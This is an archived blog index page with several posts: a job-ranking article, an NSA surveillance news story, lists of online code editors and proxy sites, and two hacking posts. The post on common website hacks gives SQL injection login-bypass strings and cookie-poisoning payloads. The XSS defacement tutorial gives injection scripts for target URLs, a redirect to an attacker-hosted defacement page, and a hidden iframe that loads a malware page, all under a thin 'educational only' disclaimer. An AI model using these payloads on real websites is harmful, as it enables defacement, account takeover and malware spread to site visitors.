Disqus for Cyber Fort

Showing posts with label website. Show all posts
Showing posts with label website. Show all posts

Wednesday, 16 April 2014

Most Desirable Job in the World Is…Here

3 Comments
job search here
For a new study ranking the best jobs of 2014, jobs website CareerCast.com did some number-crunching and found — perhaps not surprisingly — that crunching numbers is a pretty good gig.
With a median income of$101,360 and a 23% projected job growth rate by 2022, mathematician topped the site’s roundup of the most desirable jobs. CareerCast points to the “exponentially growing popularity of mathematics” in everything from healthcare and technology to sports and politics
“Mathematicians are employed in every sector of the economy… from Wall Street brokerages to energy exploration companies to IT R&D labs to university classrooms,” CareerCast publisher Tony Lee tellsBusinessInsider.
Companies and government agencies rely more heavily on analytics to make all sorts of decisions today, so employers need people who can generate and parse this data, CareerCast says in its overview. “Mathematical analyses of trends are used to gauge many activities, ranging from internet-user tendencies to airport traffic control.”
Companies looking for all these math whizzes are going to have a tough time, though: As a nation, our math skills stink. A survey of 5,000 Americans between the ages of 16 and 65 last year found that our mathematical abilities are better than those of people in just two other countries — Italy and Spain — and behind the other 18 surveyed by the Organization for Economic Cooperation and Development. “Explanations for the relatively weak performance of the United States include failings in initial schooling, lack of improvement in educational attainment over time, and poor skills in some subpopulations,” the OECD said in a report examining the U.S.’s poor academic showing.
Unfortunately, our kids aren’t any better at math than we are. In fact, when the Program for International Student Assessment evaluated the math skills of teenagers from 65 countries, it found that math scores dropped among U.S. teens. Their math abilities trail not only those of kids from countries like Japan and South Korea, but also Ireland and Poland, whose scores rose about the U.S. in the most recent test.
That’s too bad, because half of CareerCast’s top 10 jobs are in the so-called STEM fields: science, technology, engineering and mathematics. After “tenured university professor” at number two, the next two jobs are statistician and actuary (last year’s top job in CareerCast’s ranking), with median incomes of $75,560 and $93,680, respectively.
Read More

Sunday, 26 January 2014

Common Methods to Hack a Website

2 Comments
Gone are the days when website hacking was a sophisticated art. Today any body can access through the Internet and start hacking your website. All that is needed is doing a search on google with keywords like “how to hack website”, “hack into a website”, “Hacking a website” etc. The following article is not an effort to teach you website hacking, but it has more to do with raising awareness on some common website hacking methods.


The Simple SQL Injection Hack

SQL Injection involves entering SQL code into web forms, eg. login fields, or into the browser address field, to access and manipulate the database behind the site, system or application. 
When you enter text in the Username and Password fields of a login screen, the data you input is typically inserted into an SQL command. This command checks the data you've entered against the relevant table in the database. If your input matches table/row data, you're granted access (in the case of a login screen). If not, you're knocked back out.


In its simplest form, this is how the SQL Injection works. It's impossible to explain this without reverting to code for just a moment. Don't worry, it will all be over soon.
Suppose we enter the following string in a User name field:

' OR 1=1 double-dash-txt.png 

The authorization SQL query that is run by the server, the command which must be satisfied to allow access, will be something along the lines of:
SELECT * FROM users WHERE username =USRTEXT ' 
AND password = ‘PASSTEXT
…where USRTEXT and PASSTEXT are what the user enters in the login fields of the web form.
So entering `OR 1=1 — as your username, could result in the following actually being run:
SELECT * FROM users WHERE username = ‘' OR 1=1 — 'AND password = '
Two things you need to know about this:
['] closes the [user-name] text field.
'double-dash-txt.png' is the SQL convention for Commenting code, and everything after Comment is ignored. So the actual routine now becomes:
SELECT * FROM users WHERE user name = '' OR 1=1
1 is always equal to 1, last time I checked. So the authorization routine is now validated, and we are ushered in the front door to wreck havoc. 
Let's hope you got the gist of that, and move briskly on.

Brilliant! I'm gonna go to hack a Bank! 

Slow down, cowboy. This half-cooked method won't beat the systems they have in place up at Citibank,
evidentlyBut the process does serve to illustrate just what SQL Injection is all about — injecting code to manipulate a routine via a form, or indeed via the URL. In terms of login bypass via Injection, the hoary old ' OR 1=1 is just one option. If a hacker thinks a site is vulnerable, there are cheat-sheets all over the web for login strings which can gain access to weak systems. Here are a couple more common strings which are used to dupe SQL validation routines:
username field examples:
  • admin'—
  • ') or ('a'='a
  • ”) or (“a”=”a
  • hi” or “a”=”a
… and so on.

Cross site scripting ( XSS ):
Cross-site scripting or XSS is a threat to a website's security. It is the most common and popular hacking a website to gain access information from a user on a website. There are hackers with malicious objectives that utilize this to attack certain websites on the Internet. But mostly good hackers do this to find security holes for websites and help them find solutions. Cross-site scripting is a security loophole on a website that is hard to detect and stop, making the site vulnerable to attacks from malicious hackers. This security threat leaves the site and its users open to identity theft, financial theft and data theft. It would be advantageous for website owners to understand how cross-site scripting works and how it can affect them and their users so they could place the necessary security systems to block cross-site scripting on their website.

Denial of service ( Ddos attack )


A denial of service attack (DOS) is an attack through which a person can render a system unusable or significantly slow down the system for legitimate users by overloading the resources, so that no one can access it.this is not actually hacking a webite but it is used to take down a website.

If an attacker is unable to gain access to a machine, the attacker most probably will just crash the machine to accomplish a denial of service attack,this one of the most used method for website hacking




Cookie Poisoning:



Well, for a starters i can begin with saying that Cookie Poisoning is alot like SQL Injection

Both have 'OR'1'='1 or maybe '1'='1'

But in cookie poisoning you begin with alerting your cookies

Javascript:alert(document.cookie)

Then you will perharps see "username=JohnDoe" and "password=iloveJaneDoe"

in this case the cookie poisoning could be:

Javascript:void(document.cookie="username='OR'1'='1"); void(document.cookie="password='OR'1'='1");


It is also many versions of this kind... like for example

'

'1'='1'

'OR'1'='1

'OR'1'='1'OR'


and so on...

You may have to try 13 things before you get it completely right...

Password Cracking


Hashed strings can often be deciphered through 'brute forcing'. Bad news, eh? Yes, and particularly if your encrypted passwords/usernames are floating around in an unprotected file somewhere, and some Google hacker comes across it. 
You might think that just because your password now looks something like XWE42GH64223JHTF6533H in one of those files, it means that it can't be cracked? Wrong. Tools are freely available which will decipher a certain proportion of hashed and similarly encoded passwords.

Know more about Brute force attack

A Few Defensive Measures

* If you utilize a web content management system, subscribe to the development blog. Update to new versions soon as possible.
* Update all 3rd party modules as a matter of course — any modules incorporating web forms or enabling member file uploads are a potential threat. Module vulnerabilities can offer access to your full database.
* Harden your Web CMS or publishing platform. For example, if you use WordPress, use this guide as a reference.
* If you have an admin login page for your custom built CMS, why not call it 'Flowers.php' or something, instead of “AdminLogin.php” etc.?
* Enter some confusing data into your login fields like the sample Injection strings shown above, and any else which you think might confuse the server. If you get an unusual error message disclosing server-generated code then this may betray vulnerability.
* Do a few Google hacks on your name and your website. Just in case…
* When in doubt, pull the yellow cable out! It won't do you any good, but hey, it rhymes. 

hope u like this article...
Read More

Sunday, 8 December 2013

Attention: The NSA is Tracking Online Porn Viewers to Discredit

Be The First To Comment

Sitting on the wire, the NSA has the ability to track and make a record of every website you visit.  Today, the Huffington Post revealed that the NSA is using this incredible power to track who visits online porn websites, and to use this information to discredit those it deems dangerous. Their porn habits would then be "exploited to undermine a target's credibility, reputation and authority."   
The story was illustrated with six individuals, none of whom are designated terrorists themselves. Instead, they are deemed "radicalizers," people—two of which the NSA itself characterized as a "well-known media celebrity" and a "respected academic"—whose speeches and postings allegedly incite hatred or promote offensive jihad. 
The report raises the specter of abusing online viewing records to discredit other political opponents of the US government. The NSA document was reviewed not just by the NSA and counter-terrorism officials, but by entities like the Department of Commerce and the US Trade Representative. The USTR negotiates treaties (like the controversial Trans-Pacific Partnership), and one could certainly imagine that the leverage from this program could be useful in pushing for the US position. In fact, EFF and three dozen civil society groups have already asked the NSA to explain if they are spying on those advocating for the public interest in US trade policy.
Ed Snowden's latest revelation may leave SEC officials quaking as the NSA "has been gathering records of online sexual activity and evidence of visits to pornographic websites as part of a proposed plan to harm the reputations of those whom the agency believes are radicalizing others through incendiary speeches." Of course, as we have seen, this 'information' would never be used by the government for non-radical-terrorist suppressing reasons, as the ACLU notes, is is "an unwelcome reminder of what it means to give an intelligence agency unfettered access to individuals' most sensitive information using tactics associated with the secret police services of authoritarian governments."
Via Snowden...
The National Security Agency has been gathering records of online sexual activity and evidence of visits to pornographic websites as part of a proposed plan to harm the reputations of those whom the agency believes are radicalizing others through incendiary speeches, according to a top-secret NSA document.

The document, provided by NSA whistleblower Edward Snowden, identifies six targets, all Muslims, as “exemplars” of how “personal vulnerabilities” can be learned through electronic surveillance, and then exploited to undermine a target’s credibility, reputation and authority.

The NSA document, dated Oct. 3, 2012, repeatedly refers to the power of charges of hypocrisy to undermine such a messenger.”
Full ACLU Statement:
The NSA considered discrediting six people by revealing surveillance evidence of their online sexual activity, visits to pornography websites, and other personal information, according to a report today in The Huffington Post. The article cited documents leaked by former NSA contactor Edward Snowden. The targets of the NSA’s plan were all Muslims whom the NSA characterized as “radicals” but who were not believed to be involved in terrorism. The documents say one of the targets was a “U.S. person,” a term describing American citizens and legal permanent residents, but all of the targets were reportedly outside the United States.

American Civil Liberties Union Deputy Legal Director Jameel Jaffer had this reaction:

“This report is an unwelcome reminder of what it means to give an intelligence agency unfettered access to individuals' most sensitive information. One ordinarily associates these kinds of tactics with the secret police services of authoritarian governments. That these tactics have been adopted by the world’s leading democracy – and the world’s most powerful intelligence agency – is truly chilling.”

The administration keeps on attempting to justify the NSA spying by claiming there is oversight from the other branches of government. But, as Pentagon Papers whistleblower Daniel Ellsberg noted in the Why Care About NSA Spying video, spying makes a mockery of that separation. How can that oversight be meaningful if the NSA's huge storehouse of information contains the private viewing habits of every senator, representative, and judge? When the only protection against abuse is internal policies, there is no serious oversight. Congress needs to take action now to rein in the spying.


Read More

Friday, 29 November 2013

Top 10 Websites To Test Coding Online

Be The First To Comment
In this article I want to outline 10 interesting web apps for testing your code online. All of these apps require an Internet connection, and some of the more advanced editors offer pro plans to upgrade your account features. But most of these tools will surely come in handy when you’re scrambling to debug a block of JavaScript or PHP.
Modern trends and webapps have dramatically changed the way web developers can build. Obviously you need some type of IDE to code new files and save them for deployment. But what about just testing your code snippets? There are more tools available now than ever before!


1. CodePad

codepad is an online compiler/interpreter, and a simple collaboration tool. Paste your code below, and codepad will run it and give you a short URL you can use to share it in chat or email.

2. Write Code Online
The main website for WriteCodeOnline.com actually redirects to their JavaScript editor. You can choose among JS, PHP, and basic URL encoding. Their application is very safe to use and feels lighter than other alternatives.
What’s interesting is that you’ll see the output results directly underneath the text field. So when you hit “run code” it will parse through everything and display the result for you to see. It can be tough debugging some larger PHP scripts because you need to include other files.



3.TinkerBin
                    
                           

Tinkerbin lets you play with HTML,Javascript and CSS without creating files or uplading to servers. It also supports Coffeescript, Sass(with compass), Less, HAML and more. Tinkerbin may actually be my favorite online code editing resource. It supports web developers coding in HTML5/CSS3/JS and renders the output directly on-screen. The application is still in Alpha development, but most of the tools work perfectly and can quickly catch bugs.

4. JS Bin


In a similar fashion as above, jsbin is a simple JavaScript debugging console. Their pitch involves a collaborative effort where you can share a private link with other developers and write together in real time.
As you’re coding different elements the drafts will autosave. You have the ability to download your final product or keep the source code saved online. Their system is much more advanced for exporting and keeping your code as a bare template.

5. JS Fiddle


jsfiddle is one the most popular playground for web developers. It’s an online editor for snippets build from HTML, CSS and JavaScript.You can also share your code snippets with others and embed them in a blog.

Anybody who has browsed through Stack Overflow must know about jsFiddle. Their interface is a whole lot difference compared to JS Bin, along with support for more complex functions. Right away you can signup for a free account and start saving your code samples online. jsFiddle offers a short URL which you can share around the Web via Twitter, Facebook, even Stack. But notice you do not need an account to start coding. It’s just a handy feature to keep everything organized.
6. CSS Desk



Moving from the world of scripting into stylesheet language, we have CSSDesk. You’ve got a similar setup like all the rest, with your source code on the left and final webpage render on the right. This webapp is great for building small webpage templates and testing the longer CSS3 properties with gradients and box shadows.

7. JSdo.it

 
Some of the apps appear to have Japanese writing which makes me believe it was originally created somewhere in Asia. But what I love about their interface is how you can actually upload files you’ve already created and store them into a project. It’s such an easy process to store full webpage mockups online where you can access and edit them from any computer.

8. Google Code PlayGround


I would recommend saving this tool only as a resource. It’s not perfect for debugging everything you write. But Google is a huge company with a lot of open source API data. If you ever need to pull content from YouTube or custom Google Searches, this is the sandbox you want to use.
Google Code Playground is another great online tool test and run your code without opening an external editor.All of the API’s are loaded for you in the Pick an API box

9.IDEOne


What’s so great about their app is how you can quickly debug many different programming languages from the same page. You can also store this source code via a unique URL to share around the Web. However I do feel that their layout is very cluttered with ads and other content, it makes using their website difficult. It would be really cool to see the option of including alternate code libraries, such as Cocoa Touch for iPhone app development.

10. Viper 7 CodePad


This webapp also named 
Codepad is hosted on a website viper-7.com, which also redirects to the same online editor. Their debugging tools are setup for PHP output where you can change between PHP5 and PHP4.
If you create an account you can use their service as a personal storage system. Much like other online editors, you can name each PHP project and keep them hosted online for free. It’s such a powerful code editor because you don’t need any software on your computer at the time. As you parse each script the editor will offer additional meta details, such as browser request & response headers.

Read More

Saturday, 23 November 2013

How to Deface Website with Cross Site Scripting

Be The First To Comment



Today i am gonna teach you how to deface the sites which has the XSS vulnerability .

IMP NOTE : : Never implement this technique. I am just explaining it for educational purpose only.

Defacing is one of the most common thing when the hacker found the vulnerability in website. 

Defacing is changing the content the website to Hacker content. 

Most of time, attacker use this technique to inform about the vulnerability to Admin. 

But it's bad idea..!

i have some easiest methods to deface the Xss vuln sites .. i will be teaching u one by one .

step :- 1  Script for changing the background Color of a website:

<script>document.body.bgColor="red";</script>

use this in your target website as

http://www.targetwebsite.com/<script>document.body.bgColor="red";</script>

step:- 2  Script for chaning the background image of a website:

<script>document.body.background="http://your_image.jpg/";</script>

step:- 3  Defacement Page with Pastehtml:

First of all upload some defacement page(html) to pastehtml.com and get the link.

When you find a XSS vulnerable site, then insert the script as :

<script>window.location="http://www.pastehtml.com/Your_Defacement_link";</script>

This script will redirect the page to your pastehtml defacement page.

Note: You can deface only persistent XSS vulnerable sites.

step:- 4 Defacing with iframe Injection

What is an IFrame Injection?

Using IFrame tag, The Attackers injects the malware contain website(links) 

using Cross site Scripting in popular websites. 

So if the usual visitors of that popular sites opens the website, 

it will redirect to malware contain website. 

Malware will be loaded to your computer, now you are infected .

What an attacker can do with Iframe Injection?

Using Iframe Injection, an attacker can inject advertisements inside any other websites, 

insert malware infected site links, redirect to malware infected sites and more.

Iframe Injection Tutorial:

1.First of all attacker will find the Vulnerable websites using google dorks.

2. They test the vulnerability by inserting some iframe tag using the url.

3. then insert the Malicious Iframe code inside the webpage.

For Example:

he can insert this code using the url:

Code:

<iframe src=”http://malwarewebpages/web.html” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>

For php webpages:

echo “<iframe src=\”http://malwarewebpages/web.html\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>”;

I have just given some easy method only to deface the XSS affected page ..

It wil be NOOB friendly .. Still there are more methods to deface it..

please leave comment if u have any queries..and share this...

Read More

Thursday, 31 October 2013

Top 10 Proxy WebSites To Unblock Any Site

1 Comment
If you have a slow connection to a certain website, or can’t access it at all because of the restriction of your ISP, workplace or school, or simply desired to protect yourself online by hiding your private information, then an online proxy website will help you.
With the assistance of an online proxy service, you do not access your target website( e.g. Facebook ) directly, you make a request, the web proxy fetch the web page( and encrypt its content, remove scripts and advertisements ), and send it back to your browser. This makes it possible to unblock any banned site, or surf any site anonymously without leaving your footprint.
image credit www.techroadies.com
While surfing online, sometimes we come across websites which can’t be accessed due to our location or IP restrictions. Have you ever noticed this type of problem while browsing websites? This happens usually because the owner of website restricts access of website to only specific IP addresses. Sometimes they also block IP ranges of whole country so that no one from that country can access their website or content.  The other reason can be that your internet connection provider restricts access to specific websites.Similarly  most of the USA based websites are not available in other countries.
In order to access blocked websites, you will need a proxy server that automatically randomize your IP address and will assign a different IP address of another country to you. So, if your IP address is of USA, then you will be able to access websites that are blocked in your country and their access is only limited to US users. For example, YouTube is blocked in Pakistan and now only option for opening YouTube in Pakistan is with proxy. There are also some Google chrome extensions that can help you open YouTube and other blocked websites with the help of proxy. Most of the time in colleges, universities and offices etc. internet access is restricted to only specific websites. So, in order to unblock other websites, you can use proxy websites or softwares.
If you do not want to go through installation of Proxy softwares then anonymous browsing with proxy websites is the best option for you. So, in this article I am sharing a list of 5 best free Proxy websites of 2013 that will let you surf internet anonymously and securely.

1. 000FreeProxy

2. kkProxy

3. MyAddr

4. RX Proxy


5. AnonyMouse


6. Zend2


7. NewIPNow


8. KProxy


9. Mega Proxy


10. AD Free Proxy


all the image credit http://myappmag.com







Read More